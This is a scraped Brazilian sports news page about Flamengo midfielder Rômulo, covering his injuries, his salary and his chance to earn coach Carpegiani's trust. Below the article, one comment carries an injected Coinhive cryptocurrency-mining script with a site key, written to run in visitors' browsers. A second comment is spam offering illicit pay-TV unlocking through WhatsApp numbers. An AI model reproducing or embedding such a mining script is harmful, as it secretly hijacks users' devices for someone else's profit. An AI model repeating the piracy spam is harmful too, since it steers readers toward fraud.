23/1/2018 11:00

Rômulo terá tratamento especial para conquistar a confiança de Carpegiani

Volante não se firmou com a camisa do Flamengo na última temporada mas ganhará uma oportunidade de ouro

Rômulo terá tratamento especial para conquistar a confiança de Carpegiani

Foto: Gilvan de Souza / Flamengo / Divulgação

Uma das principais contratações da última temporada, Rômulo chegou com status no Flamengo, mas apesar da boa recepção e da expectativa, o volante decepcionou. Não conseguiu se firmar na equipe e ganhou até uma certa antipatia da torcida que não faz questão que o atleta siga no elenco.



Para esta temporada, a diretoria do Flamengo até colocou Rômulo como negociável mas o alto salário foi um entrave para dar andamento em algumas negociações, como a possível ida para o Internacional, que não aconteceu por falta de acordo quanto aos valores.

Ele também poderia ser envolvido na negociação por Zeca com o Santos, mas o Peixe também não se animou com a possibilidade de contar com Rômulo para esta temporada. No meio de tudo isso, o jogador segue a preparação rumo ao elenco principal do Flamengo e pode ganhar nova oportunidade.

Para sermos justos, as constantes lesões também atrapalharam bastante o desempenho de Rômulo no Flamengo. Pensando nisso, o departamento médico do clube criou um planejamento especial pa recuperar o atleta que pode se tornar uma arma importante do Rubro-Negro caso reencontre a boa forma.

Mas para isso, ele vai precisar derrotar a concorrência. Além dos titulares Arão e Cuellar, Carpegiani conta com Jonas, Ronaldo e o menino Jean Lucas, que impressionou nos jogos que fez até aqui. O volante também poderá ter que lutar contra Walace, que está bem próximo de ser o novo reforço do time.

A seu favor, Rômulo terá o fato de que o atual treinador Rubro-Negro pretende dividir sempre que possível a equipe que disputará a Libertadores com a que entrará em campo no Carioca. A ideia é dar mais espaço para os jogadores que atuam pouco, sem perder o ritmo dos atletas que disputarão a principal competição do Flamengo no ano.

Caso não consiga conquistar a confiança de Carpegiani nesses primeiros meses, o futuro de Rômulo será mesmo longe do Ninho do Urubu, que espera fazer investimentos maiores no meio da temporada e, para isso, vai limpar ainda mais a sua folha salarial.

7251 visitas - Fonte: Goal.com


Instale o app do Flamengo para Android, receba notícias e converse com outros flamenguistas no Fórum!

Mais notícias do Flamengo

Notícias de contratações do Flamengo
Notícias mais lidas

Comentários do Facebook -




Rafael Pontes     

Erro ao postar comentário.
Código do erro: 803743

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

gabriel silva     

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias do Mengão

Próximo Jogo - Carioca

Domingo - 17:00 - Cariacica - PFC
Boa Vista
Flamengo

Último jogo - Carioca

Sábado - 16:30 - Raulino de Oliveira
Flamengo
3 1
Botafogo

Classificação